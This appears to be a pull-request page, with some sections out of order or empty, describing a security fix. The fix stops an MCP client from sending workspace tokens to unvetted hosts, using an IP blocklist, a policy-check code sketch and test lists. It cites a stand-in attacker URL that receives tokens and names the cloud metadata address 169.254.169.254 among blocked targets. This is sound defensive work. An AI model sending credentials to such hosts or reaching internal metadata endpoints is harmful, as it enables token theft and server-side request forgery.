`authenticate()` closure when forwarding is disallowed.
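To make the gates and the auth scoping concrete, here is a simplified sketch of a URL policy check. It is not the PR's policy module: `checkMcpUrl`, `isBlockedIPv4`, `scopeHeaders`, and `PolicyConfig` are hypothetical names, IPv6 ranges and the DNS-resolution step are omitted, and treating localhost as a destination that never receives workspace auth is an assumption.

```ts
interface PolicyConfig {
  workspaceHost: string;
  trustedHosts: string[];
  allowLocalhost: boolean;
}

type Decision =
  | { allowed: true; forwardWorkspaceAuth: boolean }
  | { allowed: false; reason: string };

const LOCAL_NAMES = new Set(["localhost", "127.0.0.1", "[::1]"]);

// True when a dotted-quad IPv4 address is in a blocked range.
// Malformed input fails closed (returns true).
function isBlockedIPv4(ip: string): boolean {
  const parts = ip.split(".").map((p) => (/^\d{1,3}$/.test(p) ? Number(p) : NaN));
  if (parts.length !== 4 || parts.some((n) => Number.isNaN(n) || n > 255)) return true;
  const [a, b] = parts as [number, number, number, number];
  return (
    a === 0 || // 0.0.0.0/8
    a === 10 || // RFC1918 10/8
    a === 127 || // loopback
    (a === 100 && b >= 64 && b <= 127) || // CGNAT 100.64/10
    (a === 169 && b === 254) || // link-local, includes 169.254.169.254
    (a === 172 && b >= 16 && b <= 31) || // RFC1918 172.16/12
    (a === 192 && b === 168) || // RFC1918 192.168/16
    a >= 224 // multicast and above
  );
}

function checkMcpUrl(raw: string, cfg: PolicyConfig): Decision {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    return { allowed: false, reason: "invalid URL" };
  }
  const host = url.hostname.toLowerCase();
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { allowed: false, reason: "scheme" };
  }
  if (LOCAL_NAMES.has(host)) {
    return cfg.allowLocalhost
      ? { allowed: true, forwardWorkspaceAuth: false }
      : { allowed: false, reason: "localhost not permitted" };
  }
  if (url.protocol === "http:") return { allowed: false, reason: "plaintext http" };
  if (/^[\d.]+$/.test(host) && isBlockedIPv4(host)) {
    return { allowed: false, reason: "blocked IP range" };
  }
  if (host === cfg.workspaceHost.toLowerCase()) {
    return { allowed: true, forwardWorkspaceAuth: true };
  }
  if (cfg.trustedHosts.some((h) => h.toLowerCase() === host)) {
    return { allowed: true, forwardWorkspaceAuth: false };
  }
  return { allowed: false, reason: "host not allowlisted" };
}

// Drops any Authorization header unless workspace auth may be forwarded.
function scopeHeaders(headers: Record<string, string>, forward: boolean): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [k, v] of Object.entries(headers)) {
    if (forward || k.toLowerCase() !== "authorization") out[k] = v;
  }
  return out;
}

const policy: PolicyConfig = {
  workspaceHost: "my-workspace.example.com",
  trustedHosts: ["mcp.corp.internal"],
  allowLocalhost: false,
};
const metadataDecision = checkMcpUrl("https://169.254.169.254/latest/meta-data/", policy);
```

A caller would pair the two helpers: take `forwardWorkspaceAuth` from the connect-time decision and pass it to `scopeHeaders` on every later request to that destination.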
### Tests
New `mcp-host-policy.test.ts` (42 tests) covers:
- trustedHosts normalization, NODE_ENV default, invalid workspace URL
- same-origin admit with auth, trusted host admit without auth
- plaintext http rejection (including "same host wrong scheme")
- non-http(s) scheme rejection
- case-insensitive hostname match
- IP blocklist: RFC1918, link-local, CGNAT, 0.0.0.0/8, multicast,
  loopback (gated by allowLocalhost), ULA, link-local IPv6, IPv4-mapped
  IPv6, malformed IP fail-closed
- DNS-backed assertResolvedHostSafe: public, metadata, RFC1918, DNS
  failure, empty result, mixed-result "split DNS" defense

New `mcp-client.test.ts` (8 tests) covers the integrated client:
- connect rejects non-allowlisted host without any fetch
- connect rejects plaintext http without any fetch
- connect rejects DNS-resolves-to-blocked-IP without any fetch
- SP token attached only on same-origin workspace RPCs
- No auth header on any RPC to trusted external host
- callTool drops OBO token when destination is external
- callTool forwards OBO when destination is workspace
- callTool falls back to SP when no OBO override

Full appkit suite: 1361 tests passing (up from 1311). Typecheck + biome
+ knip + generate:types all clean.
### Drive-by
- `json-schema.ts` formatting violation fixed (pre-existing biome drift
  on the stack tip that would fail CI regardless).
- `AppKitMcpClient` now accepts an optional `{ dnsLookup, fetchImpl }`
  for dependency injection in tests.

Refs: S1 in the stack security plan (Tier 1, critical).
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
Closing. This fix has been split and folded into the stack where each piece belongs: policy module + client + tests into #302,
4a441d2 to d16cdd5
Closes the critical MCP-URL token-exfiltration surface identified in the agents stack review (S1 in the security plan).
The problem
Before this change, `AppKitMcpClient` accepted any absolute `http(s)://` URL as a hosted tool endpoint. It:
- Forwarded the service-principal token on `initialize` / `notifications/initialized` / `tools/list` during `connect()`, to any URL, including a developer-supplied `mcpServer("x", "https://attacker.example.com/mcp")`.
- Forwarded the end-user OBO token on `tools/call` to the same unchecked URL.
- Accepted plaintext `http://` for any host.
- Did not block `169.254.169.254` (EC2/Databricks metadata), RFC1918, or CGNAT IPs.

Result: one mistyped or compromised MCP URL leaked SP + OBO workspace credentials without any user interaction.
What ships
A new `mcp` block on `AgentsPluginConfig`:
```ts
agents({
mcp: {
trustedHosts: ["mcp.corp.internal"],
allowLocalhost: true, // default: NODE_ENV !== "production"
},
});
```
Rules enforced before the first byte is sent on every MCP URL (`connect`, `tools/call`, `notifications/initialized`):
- Only `http:` and `https:` schemes.
- `http://` refused except for `localhost` / `127.0.0.1` / `::1` when `allowLocalhost` is on.
- Hostname must match the workspace, be localhost (if permitted), or be listed in `trustedHosts`.
- Resolved DNS addresses must not land in loopback, RFC1918 (`10/8`, `172.16/12`, `192.168/16`), CGNAT (`100.64/10`), link-local (`169.254/16`, which covers cloud metadata), `0.0.0.0/8`, multicast (`>=224.0.0.0`), ULA (`fc00::/7`), IPv6 link-local (`fe80::/10`), or IPv4-mapped IPv6 equivalents. IP-literal URLs in these ranges are rejected without a DNS lookup; malformed IPs fail-closed.
- `AppKitMcpClient.callTool` drops caller-supplied `Authorization` headers (typically the OBO bearer) whenever the destination was admitted with `forwardWorkspaceAuth: false`. `sendRpc` / `sendNotification` never invoke the workspace `authenticate()` closure on those routes.

Tests
New — `mcp-host-policy.test.ts` (42 tests)
Covers the pure policy unit:
New — `mcp-client.test.ts` (8 tests)
Covers the integrated client with a recording `fetchImpl` and injected `dnsLookup`:
Gates
Non-goals / follow-ups (not in this PR)
Drive-bys
Base
This PR targets `agent/v2/6-apps-docs` so it lands on top of the agent stack (#301 → #306). Review + merge order is #301 → #306 first, then this.
Test plan